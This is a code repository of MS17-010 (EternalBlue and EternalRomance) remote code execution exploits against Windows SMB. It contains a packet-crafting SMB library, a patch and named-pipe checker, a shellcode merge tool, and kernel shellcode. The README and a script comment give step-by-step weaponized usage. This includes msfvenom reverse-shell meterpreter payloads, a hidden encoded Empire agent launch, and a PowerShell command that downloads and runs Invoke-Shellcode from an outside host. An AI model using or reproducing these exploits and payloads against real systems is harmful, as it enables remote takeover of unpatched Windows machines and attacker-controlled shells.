├── .gitignore
├── shellcode
    ├── eternalblue_sc_merge.py
    ├── eternalblue_kshellcode_x86.asm
    └── eternalblue_kshellcode_x64.asm
├── find_named_pipe.py
├── README.md
├── mysmb.py
├── eternalblue_exploit8.py
├── eternalblue_exploit7.py
└── eternalromance.py


/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_store
2 | 


--------------------------------------------------------------------------------
/shellcode/eternalblue_sc_merge.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | from struct import pack
 3 | 
 4 | if len(sys.argv) < 4:
 5 | 	print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0]))
 6 | 	sys.exit()
 7 | 
 8 | sc_x86 = open(sys.argv[1], 'rb').read()
 9 | sc_x64 = open(sys.argv[2], 'rb').read()
10 | 
11 | fp = open(sys.argv[3], 'wb')
12 | '''
13 | \x31\xc0		xor eax, eax
14 | \x40			inc eax
15 | \x0f\x84????	jz sc_x64
16 | '''
17 | fp.write('\x31\xc0\x40\x0f\x84'+pack('<I', len(sc_x86)))
18 | fp.write(sc_x86)
19 | fp.write(sc_x64)
20 | fp.close()
21 | 
22 | '''
23 | Example usage with metasploit meterpreter:
24 | 
25 | msf > use exploit/multi/handler 
26 | msf exploit(handler) > set ExitOnSession false
27 | msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
28 | msf exploit(handler) > set EXITFUNC thread
29 | msf exploit(handler) > set LHOST 0.0.0.0
30 | msf exploit(handler) > set LPORT 4444
31 | msf exploit(handler) > exploit -j
32 | ...
33 | msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
34 | msf exploit(handler) > set LPORT 4445
35 | msf exploit(handler) > exploit -j
36 | ...
37 | 
38 | 
39 | 
40 | $ msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=192.168.13.37 LPORT=4444
41 | ...
42 | $ msfvenom -p windows/meterpreter/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=192.168.13.37 LPORT=4445
43 | ...
44 | $ cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin
45 | $ cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin
46 | $ python eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
47 | $ python eternalblue_exploit7.py 192.168.13.81 sc_all.bin
48 | ...
49 | $ python eternalblue_exploit7.py 192.168.13.82 sc_all.bin
50 | ...
51 | $ python eternalblue_exploit7.py 192.168.13.83 sc_all.bin
52 | ...
53 | $ python eternalblue_exploit7.py 192.168.13.84 sc_all.bin
54 | ...
55 | '''
56 | 


--------------------------------------------------------------------------------
/find_named_pipe.py:
--------------------------------------------------------------------------------
 1 | from mysmb import MYSMB
 2 | from impacket import smb, smbconnection, nt_errors
 3 | from impacket.uuid import uuidtup_to_bin
 4 | from impacket.dcerpc.v5.rpcrt import DCERPCException
 5 | from struct import pack
 6 | import sys
 7 | 
 8 | '''
 9 | Script for
10 | - check target if MS17-010 is patched or not.
11 | - find accessible named pipe
12 | '''
13 | 
14 | 
15 | NDR64Syntax = ('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0')
16 | 
17 | MSRPC_UUID_BROWSER  = uuidtup_to_bin(('6BFFD098-A112-3610-9833-012892020162','0.0'))
18 | MSRPC_UUID_SPOOLSS  = uuidtup_to_bin(('12345678-1234-ABCD-EF00-0123456789AB','1.0'))
19 | MSRPC_UUID_NETLOGON = uuidtup_to_bin(('12345678-1234-ABCD-EF00-01234567CFFB','1.0'))
20 | MSRPC_UUID_LSARPC   = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AB','0.0'))
21 | MSRPC_UUID_SAMR     = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AC','1.0'))
22 | 
23 | pipes = {
24 | 	'browser'  : MSRPC_UUID_BROWSER,
25 | 	'spoolss'  : MSRPC_UUID_SPOOLSS,
26 | 	'netlogon' : MSRPC_UUID_NETLOGON,
27 | 	'lsarpc'   : MSRPC_UUID_LSARPC,
28 | 	'samr'     : MSRPC_UUID_SAMR,
29 | }
30 | 
31 | 
32 | if len(sys.argv) != 4:
33 | 	print("{} <ip> <username> <password>".format(sys.argv[0]))
34 | 	sys.exit(1)
35 | 
36 | target = sys.argv[1]
37 | username = sys.argv[2]
38 | password = sys.argv[3]
39 | 
40 | conn = MYSMB(target)
41 | try:
42 | 	conn.login(username, password)
43 | except smb.SessionError, e:
44 | 	print('Login failed: ' + nt_errors.ERROR_MESSAGES[e.error_code][0])
45 | 	sys.exit()
46 | finally:
47 | 	print('Target OS: ' + conn.get_server_os())
48 | 
49 | tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
50 | conn.set_default_tid(tid)
51 | 
52 | 
53 | # test if target is vulnerable
54 | TRANS_PEEK_NMPIPE = 0x23
55 | recvPkt = conn.send_trans(pack('<H', TRANS_PEEK_NMPIPE), maxParameterCount=0xffff, maxDataCount=0x800)
56 | status = recvPkt.getNTStatus()
57 | if status == 0xC0000205:  # STATUS_INSUFF_SERVER_RESOURCES
58 | 	print('The target is not patched')
59 | else:
60 | 	print('The target is patched')
61 | 	sys.exit()
62 | 
63 | 
64 | print('')
65 | print('=== Testing named pipes ===')
66 | for pipe_name, pipe_uuid in pipes.items():
67 | 	try:
68 | 		dce = conn.get_dce_rpc(pipe_name)
69 | 		dce.connect()
70 | 		try:
71 | 			dce.bind(pipe_uuid, transfer_syntax=NDR64Syntax)
72 | 			print('{}: Ok (64 bit)'.format(pipe_name))
73 | 		except DCERPCException, e:
74 | 			if 'transfer_syntaxes_not_supported' in str(e):
75 | 				print('{}: Ok (32 bit)'.format(pipe_name))
76 | 			else:
77 | 				print('{}: Ok ({})'.format(pipe_name, str(e)))
78 | 		dce.disconnect()
79 | 	except smb.SessionError, e:
80 | 		print('{}: {}'.format(pipe_name, nt_errors.ERROR_MESSAGES[e.error_code][0]))
81 | 	except smbconnection.SessionError, e:
82 | 		print('{}: {}'.format(pipe_name, nt_errors.ERROR_MESSAGES[e.error][0]))
83 | 
84 | 
85 | conn.disconnect_tree(tid)
86 | conn.logoff()
87 | conn.get_socket().close()


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # MS17-010 RCE PoC's
 2 | 
 3 | All credits go out to [worawit](https://github.com/worawit/MS17-010). I've just added some usage clarifications and weaponized them to be more usable for pentesting purposes.
 4 | 
 5 | ## Eternalblue
 6 | 
 7 | Eternalblue only requires access to IPC$ to exploit a target while other exploits require access to a named pipe as well. Eternalblue thus works on all versions of Windows that allow anonymous access to IPC$ (Windows 7 and Windows 2008, or later version explicitly configured to allow anonymous access). Keep in mind that Eternalblue has a higher change of crashing a target than Eternalsynergy - Eternalromance, so don't try this on critical systems. 
 8 | 
 9 | ### Compatible targets
10 | 
11 | **eternalblue_exploit7:**
12 | 
13 | - Windows 7 SP1 x64
14 | - Windows 7 SP1 x86
15 | - Windows Server 2008 R2 SP1 x64
16 | - Windows Server 2008 SP1 x86
17 | 
18 | **eternalblue_exploit8:**
19 | 
20 | - Windows Server 2012 R2 x64
21 | - Windows 8.1 x64
22 | 
23 | ### Exploit usage
24 | 
25 | Example for spawning a meterpreter session on an x64 machine:
26 | 
27 | 1. `nasm -f bin eternalblue_kshellcode_x64.asm`
28 | 2. `msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT>`
29 | 3. `cat eternalblue_kshellcode_x64 meterpreter_msf.bin > sc_x64.bin`
30 | 4. `python eternalblue_exploit7.py <TARGET_IP> shellcode/sc_x64.bin`
31 | 
32 | 
33 | ## Eternalromance
34 | 
35 | This exploit exploits the same bug used by NSA's Eternalromance (and Eternalsynergy). A named pipe is needed, meaning on more modern (default) configurations you will need credentials in order for the exploit to work. In most cases, domain user credentials will suffice. 
36 | 
37 | ### Compatible targets
38 | 
39 | - Windows 2016 x64
40 | - Windows 10 x64
41 | - Windows 10 x86
42 | - Windows 2012 R2 x64
43 | - Windows 2008 R2 SP1 x64
44 | - Windows 2008 SP1 x64
45 | - Windows 2008 SP1 x86
46 | - Windows 8.1 x64
47 | - Windows 8.1 x86
48 | - Windows 7 SP1 x86
49 | - Windows 7 SP1 x64
50 | - Windows 2003 SP2 x86
51 | - Windows 2003 R2 SP2 x64
52 | - Windows XP SP2 x64
53 | - Windows XP SP3 x86
54 | - Windows 2000 SP4 x86
55 | 
56 | ### Usage
57 | 
58 | Example for finding a named pipe (not required anymore, exploit now automatically finds a named pipe on the target):
59 | 
60 | `python find_named_pipe.py 192.168.178.2 testuser Password123`
61 | 
62 | Usage of `eternalromance.py`: 
63 | 
64 | `python eternalromance.py <target_ip_address> <username> <password> <command_to_execute>`
65 | 
66 | Example for spawning an Empire agent:
67 | 
68 | `python eternalromance.py 192.168.178.2 testuser Password123 "powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAHkAUwB0AEUAbQAuAE4AZQBUAC..."`
69 | 
70 | Example for spawning a meterpreter session:
71 | 
72 | `python eternalromance.py 192.168.178.2 testuser Password123 "powershell -Exec ByPass -NoP -noexit \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.3/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.178.3 -Lport 8443 -Force \""`
73 | 
74 | (I typically grab Invoke-Shellcode.ps1 from http://bit.ly/2cuWJTF, but that only works when the target has an unfiltered outbound connection.)
75 | 


--------------------------------------------------------------------------------
/mysmb.py:
--------------------------------------------------------------------------------
  1 | # impacket SMB extension for MS17-010 exploit.
  2 | # this file contains only valid SMB packet format operation.
  3 | from impacket import smb, smbconnection
  4 | from impacket.dcerpc.v5 import transport
  5 | from struct import pack
  6 | import os
  7 | import random
  8 | 
  9 | 
 10 | def getNTStatus(self):
 11 | 	return (self['ErrorCode'] << 16) | (self['_reserved'] << 8) | self['ErrorClass']
 12 | setattr(smb.NewSMBPacket, "getNTStatus", getNTStatus)
 13 | 
 14 | ############# SMB_COM_TRANSACTION_SECONDARY (0x26)
 15 | class SMBTransactionSecondary_Parameters(smb.SMBCommand_Parameters):
 16 | 	structure = (
 17 | 		('TotalParameterCount','<H=0'),
 18 | 		('TotalDataCount','<H'),
 19 | 		('ParameterCount','<H=0'),
 20 | 		('ParameterOffset','<H=0'),
 21 | 		('ParameterDisplacement','<H=0'),
 22 | 		('DataCount','<H'),
 23 | 		('DataOffset','<H'),
 24 | 		('DataDisplacement','<H=0'),
 25 | )
 26 | 
 27 | # Note: impacket-0.9.15 struct has no ParameterDisplacement
 28 | ############# SMB_COM_TRANSACTION2_SECONDARY (0x33)
 29 | class SMBTransaction2Secondary_Parameters(smb.SMBCommand_Parameters):
 30 | 	structure = (
 31 | 		('TotalParameterCount','<H=0'),
 32 | 		('TotalDataCount','<H'),
 33 | 		('ParameterCount','<H=0'),
 34 | 		('ParameterOffset','<H=0'),
 35 | 		('ParameterDisplacement','<H=0'),
 36 | 		('DataCount','<H'),
 37 | 		('DataOffset','<H'),
 38 | 		('DataDisplacement','<H=0'),
 39 | 		('FID','<H=0'),
 40 | )
 41 | 
 42 | ############# SMB_COM_NT_TRANSACTION_SECONDARY (0xA1)
 43 | class SMBNTTransactionSecondary_Parameters(smb.SMBCommand_Parameters):
 44 | 	structure = (
 45 | 		('Reserved1','3s=""'),
 46 | 		('TotalParameterCount','<L'),
 47 | 		('TotalDataCount','<L'),
 48 | 		('ParameterCount','<L'),
 49 | 		('ParameterOffset','<L'),
 50 | 		('ParameterDisplacement','<L=0'),
 51 | 		('DataCount','<L'),
 52 | 		('DataOffset','<L'),
 53 | 		('DataDisplacement','<L=0'),
 54 | 		('Reserved2','<B=0'),
 55 | 	)
 56 | 
 57 | 
 58 | def _put_trans_data(transCmd, parameters, data, noPad=False):
 59 | 	# have to init offset before calling len()
 60 | 	transCmd['Parameters']['ParameterOffset'] = 0
 61 | 	transCmd['Parameters']['DataOffset'] = 0
 62 | 
 63 | 	# SMB header: 32 bytes
 64 | 	# WordCount: 1 bytes
 65 | 	# ByteCount: 2 bytes
 66 | 	# Note: Setup length is included when len(param) is called
 67 | 	offset = 32 + 1 + len(transCmd['Parameters']) + 2
 68 | 
 69 | 	transData = ''
 70 | 	if len(parameters):
 71 | 		padLen = 0 if noPad else (4 - offset % 4 ) % 4
 72 | 		transCmd['Parameters']['ParameterOffset'] = offset + padLen
 73 | 		transData = ('\x00' * padLen) + parameters
 74 | 		offset += padLen + len(parameters)
 75 | 
 76 | 	if len(data):
 77 | 		padLen = 0 if noPad else (4 - offset % 4 ) % 4
 78 | 		transCmd['Parameters']['DataOffset'] = offset + padLen
 79 | 		transData += ('\x00' * padLen) + data
 80 | 
 81 | 	transCmd['Data'] = transData
 82 | 
 83 | 
 84 | origin_NewSMBPacket_addCommand = getattr(smb.NewSMBPacket, "addCommand")
 85 | login_MaxBufferSize = 61440
 86 | def NewSMBPacket_addCommand_hook_login(self, command):
 87 | 	# restore NewSMBPacket.addCommand
 88 | 	setattr(smb.NewSMBPacket, "addCommand", origin_NewSMBPacket_addCommand)
 89 | 
 90 | 	if isinstance(command['Parameters'], smb.SMBSessionSetupAndX_Extended_Parameters):
 91 | 		command['Parameters']['MaxBufferSize'] = login_MaxBufferSize
 92 | 	elif isinstance(command['Parameters'], smb.SMBSessionSetupAndX_Parameters):
 93 | 		command['Parameters']['MaxBuffer'] = login_MaxBufferSize
 94 | 
 95 | 	# call original one
 96 | 	origin_NewSMBPacket_addCommand(self, command)
 97 | 
 98 | def _setup_login_packet_hook(maxBufferSize):
 99 | 	# setup hook for next NewSMBPacket.addCommand if maxBufferSize is not None
100 | 	if maxBufferSize is not None:
101 | 		global login_MaxBufferSize
102 | 		login_MaxBufferSize = maxBufferSize
103 | 		setattr(smb.NewSMBPacket, "addCommand", NewSMBPacket_addCommand_hook_login)
104 | 
105 | 
106 | class MYSMB(smb.SMB):
107 | 	def __init__(self, remote_host, use_ntlmv2=True, timeout=8):
108 | 		self.__use_ntlmv2 = use_ntlmv2
109 | 		self._default_tid = 0
110 | 		self._pid = os.getpid() & 0xffff
111 | 		self._last_mid = random.randint(1000, 20000)
112 | 		if 0x4000 <= self._last_mid <= 0x4110:
113 | 			self._last_mid += 0x120
114 | 		self._pkt_flags2 = 0
115 | 		self._last_tid = 0  # last tid from connect_tree()
116 | 		self._last_fid = 0  # last fid from nt_create_andx()
117 | 		self._smbConn = None
118 | 		smb.SMB.__init__(self, remote_host, remote_host, timeout=timeout)
119 | 
120 | 	def set_pid(self, pid):
121 | 		self._pid = pid
122 | 
123 | 	def get_pid(self):
124 | 		return self._pid
125 | 
126 | 	def set_last_mid(self, mid):
127 | 		self._last_mid = mid
128 | 
129 | 	def next_mid(self):
130 | 		self._last_mid += random.randint(1, 20)
131 | 		if 0x4000 <= self._last_mid <= 0x4110:
132 | 			self._last_mid += 0x120
133 | 		return self._last_mid
134 | 
135 | 	def get_smbconnection(self):
136 | 		if self._smbConn is None:
137 | 			self.smbConn = smbconnection.SMBConnection(self.get_remote_host(), self.get_remote_host(), existingConnection=self, manualNegotiate=True)
138 | 		return self.smbConn
139 | 
140 | 	def get_dce_rpc(self, named_pipe):
141 | 		smbConn = self.get_smbconnection()
142 | 		rpctransport = transport.SMBTransport(self.get_remote_host(), self.get_remote_host(), filename='\\'+named_pipe, smb_connection=smbConn)
143 | 		return rpctransport.get_dce_rpc()
144 | 
145 | 	# override SMB.neg_session() to allow forcing ntlm authentication
146 | 	def neg_session(self, extended_security=True, negPacket=None):
147 | 		smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket)
148 | 
149 | 	# to use any login method, SMB must not be used from multiple thread
150 | 	def login(self, user, password, domain='', lmhash='', nthash='', ntlm_fallback=True, maxBufferSize=None):
151 | 		_setup_login_packet_hook(maxBufferSize)
152 | 		smb.SMB.login(self, user, password, domain, lmhash, nthash, ntlm_fallback)
153 | 
154 | 	def login_standard(self, user, password, domain='', lmhash='', nthash='', maxBufferSize=None):
155 | 		_setup_login_packet_hook(maxBufferSize)
156 | 		smb.SMB.login_standard(self, user, password, domain, lmhash, nthash)
157 | 
158 | 	def login_extended(self, user, password, domain='', lmhash='', nthash='', use_ntlmv2=True, maxBufferSize=None):
159 | 		_setup_login_packet_hook(maxBufferSize)
160 | 		smb.SMB.login_extended(self, user, password, domain, lmhash, nthash, use_ntlmv2)
161 | 
162 | 	def connect_tree(self, path, password=None, service=smb.SERVICE_ANY, smb_packet=None):
163 | 		self._last_tid = smb.SMB.tree_connect_andx(self, path, password, service, smb_packet)
164 | 		return self._last_tid
165 | 
166 | 	def get_last_tid(self):
167 | 		return self._last_tid
168 | 
169 | 	def nt_create_andx(self, tid, filename, smb_packet=None, cmd=None, shareAccessMode=smb.FILE_SHARE_READ|smb.FILE_SHARE_WRITE, disposition=smb.FILE_OPEN, accessMask=0x2019f):
170 | 		self._last_fid = smb.SMB.nt_create_andx(self, tid, filename, smb_packet, cmd, shareAccessMode, disposition, accessMask)
171 | 		return self._last_fid
172 | 
173 | 	def get_last_fid(self):
174 | 		return self._last_fid
175 | 
176 | 	def set_default_tid(self, tid):
177 | 		self._default_tid = tid
178 | 
179 | 	def set_pkt_flags2(self, flags):
180 | 		self._pkt_flags2 = flags
181 | 
182 | 	def send_echo(self, data):
183 | 		pkt = smb.NewSMBPacket()
184 | 		pkt['Tid'] = self._default_tid
185 | 
186 | 		transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)
187 | 		transCommand['Parameters'] = smb.SMBEcho_Parameters()
188 | 		transCommand['Data'] = smb.SMBEcho_Data()
189 | 
190 | 		transCommand['Parameters']['EchoCount'] = 1
191 | 		transCommand['Data']['Data'] = data
192 | 		pkt.addCommand(transCommand)
193 | 
194 | 		self.sendSMB(pkt)
195 | 		return self.recvSMB()
196 | 
197 | 	def do_write_andx_raw_pipe(self, fid, data, mid=None, pid=None, tid=None):
198 | 		writeAndX = smb.SMBCommand(smb.SMB.SMB_COM_WRITE_ANDX)
199 | 		writeAndX['Parameters'] = smb.SMBWriteAndX_Parameters_Short()
200 | 		writeAndX['Parameters']['Fid'] = fid
201 | 		writeAndX['Parameters']['Offset'] = 0
202 | 		writeAndX['Parameters']['WriteMode'] = 4  # SMB_WMODE_WRITE_RAW_NAMED_PIPE
203 | 		writeAndX['Parameters']['Remaining'] = 12345  # can be any. raw named pipe does not use it
204 | 		writeAndX['Parameters']['DataLength'] = len(data)
205 | 		writeAndX['Parameters']['DataOffset'] = 32 + len(writeAndX['Parameters']) + 1 + 2 + 1 # WordCount(1), ByteCount(2), Padding(1)
206 | 		writeAndX['Data'] = '\x00' + data  # pad 1 byte
207 | 
208 | 		self.send_raw(self.create_smb_packet(writeAndX, mid, pid, tid))
209 | 		return self.recvSMB()
210 | 
211 | 	def create_smb_packet(self, smbReq, mid=None, pid=None, tid=None):
212 | 		if mid is None:
213 | 			mid = self.next_mid()
214 | 
215 | 		pkt = smb.NewSMBPacket()
216 | 		pkt.addCommand(smbReq)
217 | 		pkt['Tid'] = self._default_tid if tid is None else tid
218 | 		pkt['Uid'] = self._uid
219 | 		pkt['Pid'] = self._pid if pid is None else pid
220 | 		pkt['Mid'] = mid
221 | 		flags1, flags2 = self.get_flags()
222 | 		pkt['Flags1'] = flags1
223 | 		pkt['Flags2'] = self._pkt_flags2 if self._pkt_flags2 != 0 else flags2
224 | 
225 | 		if self._SignatureEnabled:
226 | 			pkt['Flags2'] |= smb.SMB.FLAGS2_SMB_SECURITY_SIGNATURE
227 | 			self.signSMB(pkt, self._SigningSessionKey, self._SigningChallengeResponse)
228 | 
229 | 		req = str(pkt)
230 | 		return '\x00'*2 + pack('>H', len(req)) + req  # assume length is <65536
231 | 
232 | 	def send_raw(self, data):
233 | 		self.get_socket().send(data)
234 | 
235 | 	def create_trans_packet(self, setup, param='', data='', mid=None, maxSetupCount=None, totalParameterCount=None, totalDataCount=None, maxParameterCount=None, maxDataCount=None, pid=None, tid=None, noPad=False):
236 | 		if maxSetupCount is None:
237 | 			maxSetupCount = len(setup)
238 | 		if totalParameterCount is None:
239 | 			totalParameterCount = len(param)
240 | 		if totalDataCount is None:
241 | 			totalDataCount = len(data)
242 | 		if maxParameterCount is None:
243 | 			maxParameterCount = totalParameterCount
244 | 		if maxDataCount is None:
245 | 			maxDataCount = totalDataCount
246 | 		transCmd = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION)
247 | 		transCmd['Parameters'] = smb.SMBTransaction_Parameters()
248 | 		transCmd['Parameters']['TotalParameterCount'] = totalParameterCount
249 | 		transCmd['Parameters']['TotalDataCount'] = totalDataCount
250 | 		transCmd['Parameters']['MaxParameterCount'] = maxParameterCount
251 | 		transCmd['Parameters']['MaxDataCount'] = maxDataCount
252 | 		transCmd['Parameters']['MaxSetupCount'] = maxSetupCount
253 | 		transCmd['Parameters']['Flags'] = 0
254 | 		transCmd['Parameters']['Timeout'] = 0xffffffff
255 | 		transCmd['Parameters']['ParameterCount'] = len(param)
256 | 		transCmd['Parameters']['DataCount'] = len(data)
257 | 		transCmd['Parameters']['Setup'] = setup
258 | 		_put_trans_data(transCmd, param, data, noPad)
259 | 		return self.create_smb_packet(transCmd, mid, pid, tid)
260 | 
261 | 	def send_trans(self, setup, param='', data='', mid=None, maxSetupCount=None, totalParameterCount=None, totalDataCount=None, maxParameterCount=None, maxDataCount=None, pid=None, tid=None, noPad=False):
262 | 		self.send_raw(self.create_trans_packet(setup, param, data, mid, maxSetupCount, totalParameterCount, totalDataCount, maxParameterCount, maxDataCount, pid, tid, noPad))
263 | 		return self.recvSMB()
264 | 
265 | 	def create_trans_secondary_packet(self, mid, param='', paramDisplacement=0, data='', dataDisplacement=0, pid=None, tid=None, noPad=False):
266 | 		transCmd = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION_SECONDARY)
267 | 		transCmd['Parameters'] = SMBTransactionSecondary_Parameters()
268 | 		transCmd['Parameters']['TotalParameterCount'] = len(param)
269 | 		transCmd['Parameters']['TotalDataCount'] = len(data)
270 | 		transCmd['Parameters']['ParameterCount'] = len(param)
271 | 		transCmd['Parameters']['ParameterDisplacement'] = paramDisplacement
272 | 		transCmd['Parameters']['DataCount'] = len(data)
273 | 		transCmd['Parameters']['DataDisplacement'] = dataDisplacement
274 | 
275 | 		_put_trans_data(transCmd, param, data, noPad)
276 | 		return self.create_smb_packet(transCmd, mid, pid, tid)
277 | 
278 | 	def send_trans_secondary(self, mid, param='', paramDisplacement=0, data='', dataDisplacement=0, pid=None, tid=None, noPad=False):
279 | 		self.send_raw(self.create_trans_secondary_packet(mid, param, paramDisplacement, data, dataDisplacement, pid, tid, noPad))
280 | 
281 | 	def create_trans2_packet(self, setup, param='', data='', mid=None, maxSetupCount=None, totalParameterCount=None, totalDataCount=None, maxParameterCount=None, maxDataCount=None, pid=None, tid=None, noPad=False):
282 | 		if maxSetupCount is None:
283 | 			maxSetupCount = len(setup)
284 | 		if totalParameterCount is None:
285 | 			totalParameterCount = len(param)
286 | 		if totalDataCount is None:
287 | 			totalDataCount = len(data)
288 | 		if maxParameterCount is None:
289 | 			maxParameterCount = totalParameterCount
290 | 		if maxDataCount is None:
291 | 			maxDataCount = totalDataCount
292 | 		transCmd = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2)
293 | 		transCmd['Parameters'] = smb.SMBTransaction2_Parameters()
294 | 		transCmd['Parameters']['TotalParameterCount'] = totalParameterCount
295 | 		transCmd['Parameters']['TotalDataCount'] = totalDataCount
296 | 		transCmd['Parameters']['MaxParameterCount'] = maxParameterCount
297 | 		transCmd['Parameters']['MaxDataCount'] = maxDataCount
298 | 		transCmd['Parameters']['MaxSetupCount'] = len(setup)
299 | 		transCmd['Parameters']['Flags'] = 0
300 | 		transCmd['Parameters']['Timeout'] = 0xffffffff
301 | 		transCmd['Parameters']['ParameterCount'] = len(param)
302 | 		transCmd['Parameters']['DataCount'] = len(data)
303 | 		transCmd['Parameters']['Setup'] = setup
304 | 		_put_trans_data(transCmd, param, data, noPad)
305 | 		return self.create_smb_packet(transCmd, mid, pid, tid)
306 | 
307 | 	def send_trans2(self, setup, param='', data='', mid=None, maxSetupCount=None, totalParameterCount=None, totalDataCount=None, maxParameterCount=None, maxDataCount=None, pid=None, tid=None, noPad=False):
308 | 		self.send_raw(self.create_trans2_packet(setup, param, data, mid, maxSetupCount, totalParameterCount, totalDataCount, maxParameterCount, maxDataCount, pid, tid, noPad))
309 | 		return self.recvSMB()
310 | 
311 | 	def create_trans2_secondary_packet(self, mid, param='', paramDisplacement=0, data='', dataDisplacement=0, pid=None, tid=None, noPad=False):
312 | 		transCmd = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)
313 | 		transCmd['Parameters'] = SMBTransaction2Secondary_Parameters()
314 | 		transCmd['Parameters']['TotalParameterCount'] = len(param)
315 | 		transCmd['Parameters']['TotalDataCount'] = len(data)
316 | 		transCmd['Parameters']['ParameterCount'] = len(param)
317 | 		transCmd['Parameters']['ParameterDisplacement'] = paramDisplacement
318 | 		transCmd['Parameters']['DataCount'] = len(data)
319 | 		transCmd['Parameters']['DataDisplacement'] = dataDisplacement
320 | 
321 | 		_put_trans_data(transCmd, param, data, noPad)
322 | 		return self.create_smb_packet(transCmd, mid, pid, tid)
323 | 
324 | 	def send_trans2_secondary(self, mid, param='', paramDisplacement=0, data='', dataDisplacement=0, pid=None, tid=None, noPad=False):
325 | 		self.send_raw(self.create_trans2_secondary_packet(mid, param, paramDisplacement, data, dataDisplacement, pid, tid, noPad))
326 | 
327 | 	def create_nt_trans_packet(self, function, setup='', param='', data='', mid=None, maxSetupCount=None, totalParameterCount=None, totalDataCount=None, maxParameterCount=None, maxDataCount=None, pid=None, tid=None, noPad=False):
328 | 		if maxSetupCount is None:
329 | 			maxSetupCount = len(setup)
330 | 		if totalParameterCount is None:
331 | 			totalParameterCount = len(param)
332 | 		if totalDataCount is None:
333 | 			totalDataCount = len(data)
334 | 		if maxParameterCount is None:
335 | 			maxParameterCount = totalParameterCount
336 | 		if maxDataCount is None:
337 | 			maxDataCount = totalDataCount
338 | 		transCmd = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)
339 | 		transCmd['Parameters'] = smb.SMBNTTransaction_Parameters()
340 | 		transCmd['Parameters']['MaxSetupCount'] = maxSetupCount
341 | 		transCmd['Parameters']['TotalParameterCount'] = totalParameterCount
342 | 		transCmd['Parameters']['TotalDataCount'] = totalDataCount
343 | 		transCmd['Parameters']['MaxParameterCount'] = maxParameterCount
344 | 		transCmd['Parameters']['MaxDataCount'] = maxDataCount
345 | 		transCmd['Parameters']['ParameterCount'] = len(param)
346 | 		transCmd['Parameters']['DataCount'] = len(data)
347 | 		transCmd['Parameters']['Function'] = function
348 | 		transCmd['Parameters']['Setup'] = setup
349 | 		_put_trans_data(transCmd, param, data, noPad)
350 | 		return self.create_smb_packet(transCmd, mid, pid, tid)
351 | 
352 | 	def send_nt_trans(self, function, setup='', param='', data='', mid=None, maxSetupCount=None, totalParameterCount=None, totalDataCount=None, maxParameterCount=None, maxDataCount=None, pid=None, tid=None, noPad=False):
353 | 		self.send_raw(self.create_nt_trans_packet(function, setup, param, data, mid, maxSetupCount, totalParameterCount, totalDataCount, maxParameterCount, maxDataCount, pid, tid, noPad))
354 | 		return self.recvSMB()
355 | 
356 | 	def create_nt_trans_secondary_packet(self, mid, param='', paramDisplacement=0, data='', dataDisplacement=0, pid=None, tid=None, noPad=False):
357 | 		transCmd = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT_SECONDARY)
358 | 		transCmd['Parameters'] = SMBNTTransactionSecondary_Parameters()
359 | 		transCmd['Parameters']['TotalParameterCount'] = len(param)
360 | 		transCmd['Parameters']['TotalDataCount'] = len(data)
361 | 		transCmd['Parameters']['ParameterCount'] = len(param)
362 | 		transCmd['Parameters']['ParameterDisplacement'] = paramDisplacement
363 | 		transCmd['Parameters']['DataCount'] = len(data)
364 | 		transCmd['Parameters']['DataDisplacement'] = dataDisplacement
365 | 		_put_trans_data(transCmd, param, data, noPad)
366 | 		return self.create_smb_packet(transCmd, mid, pid, tid)
367 | 
368 | 	def send_nt_trans_secondary(self, mid, param='', paramDisplacement=0, data='', dataDisplacement=0, pid=None, tid=None, noPad=False):
369 | 		self.send_raw(self.create_nt_trans_secondary_packet(mid, param, paramDisplacement, data, dataDisplacement, pid, tid, noPad))
370 | 
371 | 	def recv_transaction_data(self, mid, minLen):
372 | 		data = ''
373 | 		while len(data) < minLen:
374 | 			recvPkt = self.recvSMB()
375 | 			if recvPkt['Mid'] != mid:
376 | 				continue
377 | 			resp = smb.SMBCommand(recvPkt['Data'][0])
378 | 			data += resp['Data'][1:]  # skip padding
379 | 			#print(len(data))
380 | 		return data
381 | 


--------------------------------------------------------------------------------
/shellcode/eternalblue_kshellcode_x86.asm:
--------------------------------------------------------------------------------
  1 | ;
  2 | ; Windows x86 kernel shellcode from ring 0 to ring 3 by sleepya
  3 | ; The shellcode is written for eternalblue exploit: eternalblue_exploit7.py
  4 | ;
  5 | ;
  6 | ; Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0)
  7 | ;
  8 | ;
  9 | ; Note:
 10 | ; - The userland shellcode is run in a new thread of system process.
 11 | ;     If userland shellcode causes any exception, the system process get killed.
 12 | ; - On idle target with multiple core processors, the hijacked system call might take a while (> 5 minutes) to 
 13 | ;     get call because system call is called on other processors.
 14 | ; - Compiling shellcode with specific Windows version macro, corrupted buffer will be freed.
